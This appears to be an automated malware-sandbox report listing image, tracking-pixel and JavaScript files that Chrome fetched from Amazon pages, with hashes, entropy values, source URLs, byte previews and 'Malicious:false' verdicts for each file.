                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........7......................................................................q`...=.E+.YC.............:.S.s!h;o'a?\..]...l.........g...t}.....}....R.z3$.o........=..Y...B.h....!Ku|.nZwT....;k.l ......V......SUR..12..~rW.)=,.Bd.....i.&..b.~../.z'&^L.J.....T&@......3,.................?...9............................#3..$@CS.....s!"14DPc...AB.........?..E.Y...t..e6KH.......h..'HX...fK.......- ....Gv......vV..k.~..g....a.Y..,q).OP......g........^.dL<..+,....1.y.[...oQ1(./.0.....(..........q.<..Az..+*...A..b.lwK.W9...YK.....O...Zae.D.ef."....."t.2yM.:..4......R.k&.......$...B..._mQ[.....r~bY.3qb,.O.[......bY..^.e^W...B...{b.3...G.=P.X..K.TYu.m...2....H.)..8..*.Io.....^....Wv.d.F>...J....'._).m-..G+....w....Q7......lWq.....rQ.4...b....V.Or.V...K+.DD2..D};_'..........kQ..."..E.h..~..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17543
                                                                                                                                                                                                                                                                Entropy (8bit):7.949246067715574
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:JAY4t29xKLSyL8wcj4+vt7/G2bgnc+Ax5mqlXFgquj9MF0KVBGk:KY4tKu7L8wcEet7/j8RQ1gqmY0il
                                                                                                                                                                                                                                                                MD5:40A8B803B2A97DFBF6BC7474E69E0606
                                                                                                                                                                                                                                                                SHA1:2FE3407465A0E85D17FFAB673606514BF5ECD6B6
                                                                                                                                                                                                                                                                SHA-256:2C240DF97D0DDDC2468777675A4D4EFDC35E8B5DF2C88E2AE5409CA9C8E1C89F
                                                                                                                                                                                                                                                                SHA-512:31B9C7E7AD7C10D88028A780971319105469C71AF572AE07CDD2023A65FC14CFF7E7460D1B1FCD6E70FF128EEDE1A1EBDB660F73B110A5478092514E5363E524
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5........................................................................6...c...+....V....l..[.......lI...l)....E.;.^..=....d.k}..&*a..'%DF..{?O8..X.7.<o............roYp.N5~k.;g.0k.H.0..M....1.a...b.O.....m.52cly..6.:..m{.=6.z.#l.F.Q....i..N......Ky..G.@........~..[K..y*d..=.y{..:sSmz..1..r..f...%8.....Q.......QY.xv....r."..H......3............p.s. ..E/.bJX...7.a.#......+w.zuL.[..{/:..f.Xv.6....S\..3...T...}."(...............A.....,C....._BB.z..("t|..I.%......7|F.ozI...yN4;zR'J{.*....s..~..\.'SM.lO0{.>MyG..rw..).<u.8n........:.W9..N/.0..1.0.5.Eq...j...Ap.kK&.5....x.C1I&..r...+?..`.dt.c.-....2.N@T."UD3S.@..@.............s.D....~ue../.|./.a.y.7C.S^n...9..V...1..<.S..W.m.~u....q.....=.....S._....L47....J>.....F1{ ...........n.sJ....5..........S.n:v#uC.n1;r..=./O
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26sw%3D1280%26sh%3D1024%26vw%3D1280%26vh%3D907%26m%3D1%26sc%3DPAGVV1BKBQP3X0S0NFTP%26ue%3D1%26bb%3D55%26cf%3D159%26be%3D166%26fp%3D130%26fcp%3D130%26pc%3D382%26tc%3D-1095%26na_%3D-1095%26ul_%3D-1723469074018%26_ul%3D-1723469074018%26rd_%3D-1092%26_rd%3D-566%26fe_%3D-566%26lk_%3D-563%26_lk%3D-563%26co_%3D-563%26_co%3D-326%26sc_%3D-563%26rq_%3D-326%26rs_%3D-40%26_rs%3D146%26dl_%3D-36%26di_%3D255%26de_%3D256%26_de%3D259%26_dc%3D380%26ld_%3D381%26_ld%3D-1723469074018%26ntd%3D-1%26ty%3D0%26rc%3D1%26hob%3D1%26hoe%3D1%26ld%3D382%26t%3D1723469074400%26ctb%3D1%26rt%3Dcf%3A13-10-3-0-2-1-1__ld%3A14-11-3-0-2-1-0%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cfls-eu-amazon-com%7Cadblk_no%7CperfYes%7CmutObsActive%26viz%3Dvisible%3A1%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:384
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (661)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):510414
                                                                                                                                                                                                                                                                Entropy (8bit):5.481849721457995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:B1dVp8opvwtWgupFmzQPOkzblCAx1CDz1TJymdWAkuc03Fp0c/DrniaOdKS7xmzw:/JwrFkzblPSZzZZKjDXecIen7
                                                                                                                                                                                                                                                                MD5:0664BD144840D3E4FCB37012F6C9870F
                                                                                                                                                                                                                                                                SHA1:F84DB189E5CD87038C4866F2A00952881A543E7E
                                                                                                                                                                                                                                                                SHA-256:E66C34AC267A3E2CB25355EE18E681D0851BE7F387345960ED7388FA3A702E0D
                                                                                                                                                                                                                                                                SHA-512:1FB4127D46AFBF7925D757602EF99790F6BF2AADC011D2C1188302D6CC05CE2D01EB5354290F8D9B4EC97648E7DB3BE40935B7375029FF62A40ACD4C4D48DDB0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(b){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,a=d?d("TurboCheckoutBaseAssets@accessibility_switch",""):c;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,c,d){b.when("turbo-initiate-migration-switch").register("turbo-checkout-accessibility-switch",function(a){return{isEnabled:function(){return a.isEnabled()}}})});./* ******** */.(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("TurboCheckoutBaseAssets@buy_now_to_tango_switch",""):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){a.when("turbo-configuration","buy-now-to-tango-switch-mobile","buy-now-to-tango-switch-desktop","buy-now-to-tango-switch-beta").register("buy-now-to-tango-switch",function(b,a,c,d){return{isEnabled:function(){return b.get(b.KEYS.IS_BUY_NOW_TO_TANGO_ENABLED)&&(a.isGatingWeblabEnabled()||.c.isGatingWeblabEnabled()||d.isGatingWeblabEnabled())}}});"use st
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6494%26pc%3D7585%26at%3D7585%26t%3D1723469085491%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DP3EBDX30THKD0V702NQB%26aftb%3D1%26lob%3D1:7584
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D27632%26at%3D27632%26t%3D1723469122081%26csmtags%3DbrowserQuiteMut%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27633
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DC37SFEY0GDXEZ5HDEVRN%26ue%3D6%26bb%3D1312%26ns%3D1335%26ne%3D1376%26be%3D1599%26cf%3D3071%26af%3D8717%26fn%3D8717%26fp%3D17513%26fcp%3D17513%26pc%3D41598%26tc%3D-1188%26na_%3D-1188%26ul_%3D-1723469002998%26_ul%3D-1723469002998%26rd_%3D-1723469002998%26_rd%3D-1723469002998%26fe_%3D-1184%26lk_%3D-1138%26_lk%3D-1138%26co_%3D-1138%26_co%3D-366%26sc_%3D-1097%26rq_%3D-365%26rs_%3D-36%26_rs%3D505%26dl_%3D-28%26di_%3D1807%26de_%3D1807%26_de%3D1807%26_dc%3D41575%26ld_%3D41575%26_ld%3D-1723469002998%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D4%26hoe%3D6%26ld%3D41599%26t%3D1723469044597%26ctb%3D1%26rt%3Dcf%3A14-1-4-7-2-0-1_af%3A44-1-5-33-5-0-1_ld%3A240-9-7-215-7-0-1%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41625
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9464
                                                                                                                                                                                                                                                                Entropy (8bit):7.8614454368406514
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:PUfZRotOV4f+4cbawN9drNNUjyp49CnydVpc8Hf+Gne:PUfEm4f9cb7N/PKy49Cnyjpc8WGe
                                                                                                                                                                                                                                                                MD5:25BACBBBFB1E0FA84DAD156372F72881
                                                                                                                                                                                                                                                                SHA1:D8E85B0813FB5D2903310E039D3F4C6094005CB3
                                                                                                                                                                                                                                                                SHA-256:50875803E66EBDAAD65BD4CF01D044A468154895536B74AD7AA5AB5404B30BF5
                                                                                                                                                                                                                                                                SHA-512:D27DFBCEE36454610DA85DF560BBC6F4D165EF998B6D7EDEBDD32B8958905BC13706F10F2E2E97FA6A6AAD45BE7BB8B3B2F904EC2D7CEDF077C38E0DA0AEBE7F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71Azno56mDL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3...............................................................................5.....................kl.........#.t.......................0|."`l.F...:8..................+4.453k....%1$..<....Z!>.^.3.>VzJ.n..@...............l.6......|..qLb..n}..x.k...&.s..L..v.%}C...4.................l.co.^>..KcF-.d......&...>............B.........GAI..4............=.)8epf........4...J.d..9............t...y.;?<...\Uo.S...7...........hU.......39`b.+...f6~.7Z..x...h..v.T..c.......l......AnJ[....<.!2..u.............r&c...$q..s.gi.)6z..=".1.b...X...h.Z2...%..1j.e...=..FC..^.v?9.f..6.............I...6...M..Xs.gJ.Y...Fr.d..k[....^...+N.`......n'>...BW...~}.{}K...5n...Cz.........(..V.-Z.R|....a....g"....6.~...e..:.....I.n..Z...*.;...".}...v...>|{..}...X..t.z.^.C.............2...%._CF..j..L...L..o
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (506)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1897
                                                                                                                                                                                                                                                                Entropy (8bit):5.295537930728398
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:DxGQO2Vkgw6yp34Ih/Z/UD6B9zexGqpUDIRtVKn0FP0I2:DxG52VkgwtA6TeoIRDE0SI2
                                                                                                                                                                                                                                                                MD5:84FC07603C6B7D7C8A4DEA1951AA3F51
                                                                                                                                                                                                                                                                SHA1:81D1C249A0A70129C96F8111ABCFCB3E62F2F4ED
                                                                                                                                                                                                                                                                SHA-256:1E90436DD878AC44E6868965D8DD7FFA194CBA607D31B83FF21CB31D48A70DF0
                                                                                                                                                                                                                                                                SHA-512:1139A5C5A64AB3FB74832ECA3087D0A9E9C9277473A9FAC6156D03C43AB058F81C55F3C828273604E0F48C4290ED6AA538D8D53127CAE7F29D574E2AED34D422
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01e0fnoXVzL.js?AUIClients/PerformanceResourceTimingAssets
                                                                                                                                                                                                                                                                Preview:(function(c){var b=window.AmazonUIPageJS||window.P,f=b._namespace||b.attributeErrors,e=f?f("PerformanceResourceTimingAssets",""):b;e.guardFatal?e.guardFatal(c)(e,window):e.execute(function(){c(e,window)})})(function(c,b,f){"use strict";c.when("performance-resource-timing-utils").register("performance-resource-timing",function(e){function c(a){for(var h={},b=0;b<a.length;++b){var d=a[b],g=e.determineType(d.name),c=d.duration,m=d.responseEnd,k=d.transferSize||0;d=k/1024;k=0===k&&100>c;var l=h[g]||(h[g]=.{});g=function(a,b){l[a]=(l[a]||0)+(b!==f?b:1)};var n=function(a,b){l[a]=Math.max(l[a]||0,b)};g("requests");g("requests"+(k?"-cached":"-uncached"));g("total-duration",c);n("max-duration",c);g("total-transferred",d);n("max-transferred",d);n("long-pull",m)}p(h);return h}function p(a){for(var b in a)if(a.hasOwnProperty(b)){var c=a[b],d=100*(c["requests-cached"]||0)/c.requests;c["cache-hit-rate"]=d;c["cache-hit-rate-bucket"]=10*Math.ceil(d/10)}}function m(a,c){c=c!==f?c:1;b.ue&&b.ue.count&&b.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (312), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):312
                                                                                                                                                                                                                                                                Entropy (8bit):5.0610226231601345
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:2LGHT3O/BHWYK7cidi61MRR1RcKMAuOLNhFys0NU3iBeHKeUIki:2k+/BHWYK7cUEc5OL0s0ahUIr
                                                                                                                                                                                                                                                                MD5:CEE4A140BDD25DE758024B5972807BD0
                                                                                                                                                                                                                                                                SHA1:837EAF911C0E7A1756F268491ED9B3328319F1B1
                                                                                                                                                                                                                                                                SHA-256:C8D5B88634C6E632B62C5839E27E653182AFA6F95DC61BD078CE012041C8365D
                                                                                                                                                                                                                                                                SHA-512:1F5CB78DCDE99F87E0BBEC4E72048609D423D9578226860564DA200917ACC9CD590AD58C8E8BF445D3EE421B53BDADA4E77B8E683704CB265990CF99E7F3A14C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(b){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,a=d?d("F3CollapsedCartAssets",""):c;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,c,d){b.when("A").register("F3CartViewType",function(a){return{isCollapsedCart:function(){return!0}}})});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D5700%26at%3D5700%26t%3D1723469093777%26csmtags%3DbrowserQuiteMut%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5702
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15372
                                                                                                                                                                                                                                                                Entropy (8bit):7.928920204966112
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:V6H38kclL9X8jAnj+2KW71X46F2on5xSkOV/1TIa7r65HTJV/tXkqYbhJfDifKTb:VWHQji2KOX46gujbC+LUqY1JfD3NZs7w
                                                                                                                                                                                                                                                                MD5:C43C3BBA041F801D6B8F3C91849E8580
                                                                                                                                                                                                                                                                SHA1:D6F1E73316DA098FC9E03D5C04FA38C095B6AFFF
                                                                                                                                                                                                                                                                SHA-256:8A5EFB1ACE71847ACD9BACC4E04948E516A2D3FDDF347E3B1FEE575C7FD24477
                                                                                                                                                                                                                                                                SHA-512:34BFFF03FD28506A31939B2B99DC9685EB00A705BD5904D5EF01F099C6732B73B16D6484284AA056EFD97C2914D46368A0FE4AB4EB5B955E83D9277AABAE6EBF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71xF9JoiB7L._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................,.......S.]O...._.w..../..=eg...............q.{.....H.M7z.Kv.O..M....-................ZO.....b..c..L.[..w.......o......+B.....................<{..`.Z|....6t.............9...R..@...K.K.j.............=..0T.>ys......8.I._V....H.9.0..t.;.....?..h..).j.....w4...C.t.L....(...........R..R.~yr.f....CH...K...x.......2G.v...v.9..d.=....c.b"^.........tc...........H..J..w<.@........1.G.....<..V.......i.qP:1............G..5..y[.,7:./...G...y..;..b?..Oh../.9..V....g.....uV...m.=R....\.$...............J.<.R..>...Gz.......gf.i....+9|O.7.W..q._.;&4..0ArOJ..<=..v.u..[.(..6..O."..d.................M3.@.......~Y...n...u......sX..8s...vZ{}K.O..5r.....OS..W9............U.O.J..|....A.zX..............._....#.v.+...wt..>......j
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26ctb%3D1%26sc0%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb0%3D1278%26pc0%3D5311%26ld0%3D5311%26t0%3D1723469072677%26csmtags%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:5311
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4700
                                                                                                                                                                                                                                                                Entropy (8bit):7.8900869634402815
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TQeVYhIRHDLdZModMnHraa+vJpUbo67qyK5EY57+PBZ773FG:MhMDLdxOHraaqWE67qyJYiT77VG
                                                                                                                                                                                                                                                                MD5:9AA2F2B6A3B552E5CCD341A137D51895
                                                                                                                                                                                                                                                                SHA1:887FF5FA68127110D51E8568E155D0F790596F72
                                                                                                                                                                                                                                                                SHA-256:268A090862453FD7C5B1A9893E213E68CF323A3A68E39103EB2BF58D71701179
                                                                                                                                                                                                                                                                SHA-512:5A0F0326D5A8DFC3E325A7EDF7A455986BE1EA2034964F6987CB2F04381212125604A471A3D891EBD07CB5CD757CA3450F4BCD9E1726561556D69057ACFCA18E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/716-WxhiNnL._AC_UL225_SR225,160_.jpg"
